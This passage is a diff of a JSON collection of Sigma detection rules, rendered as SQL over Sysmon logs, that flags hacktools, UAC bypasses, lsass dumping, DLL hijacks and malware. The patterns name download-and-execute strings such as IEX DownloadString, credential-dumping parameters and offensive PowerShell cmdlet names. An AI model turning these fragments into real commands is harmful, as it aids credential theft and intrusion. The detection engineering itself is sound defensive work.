OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "VMToolsd Suspicious Child Process", + "id": "5687f942-867b-4578-ade7-1e341c46e99a", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "author": "behops, Bhabesh Raj", + "tags": [ + "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'RUNDLL32.EXE', 'REGSVR32.EXE', 'wscript.exe', 'cscript.exe'))) AND NOT ((CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweron-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\poweroff-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\resume-vm-default.bat%' ESCAPE '\\' OR CommandLine LIKE '%\\\\VMware\\\\VMware Tools\\\\suspend-vm-default.bat%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "title": "UAC Bypass via ICMLuaUtil", + "id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '%/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '%/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe'))" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_uac_bypass_icmluautil.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Suspicious PowerShell Download and Execute Pattern", + "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "status": "experimental", + "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Software installers that pull packages from remote systems and execute them" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_powershell_susp_download_patterns.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", + "title": "ZxShell Malware", + "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", "status": "test", - 
"description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "description": "Detects a ZxShell start by the called and well-known function name", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1059.001", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1027.005" + "attack.t1218.011", + "attack.s0412", + "attack.g0001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_apt_zxshell.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", - "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for 
connections.\n", + "title": "Process Access via TrolleyExpress Exclusion", + "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "status": "experimental", + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" ], - "filename": "proc_creation_win_pua_ngrok.yml" + "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" }, { - "title": "Execution from Suspicious Folder", - "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", + "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", + "id": "8cde342c-ba48-4b74-b615-172c330f2e93", "status": "experimental", - "description": "Detects a suspicious execution from an uncommon folder", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.credential_access", "attack.defense_evasion", - "attack.t1036" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' 
ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "title": "Pingback Backdoor DLL Loading Activity", + "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1574.001" ], 
"falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "image_load_malware_pingback_backdoor.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "title": "Possible Process Hollowing Image Loading", + "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", + "author": "Markus Neis", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Very likely, needs more tuning" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "image_load_susp_uncommon_image_load.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "DotNet CLR DLL Loaded By Scripting Applications", + "id": "4508a70e-97ef-4300-b62b-ff27992990ea", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. 
This could be an indication of potential suspicious execution.", + "author": "omkar72, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + "title": "PCRE.NET Package Image Load", + "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects processes loading modules related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open 
Threat Research)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1059" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "image_load_pcre_net_load.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", - "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine 
LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE 
'\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE 
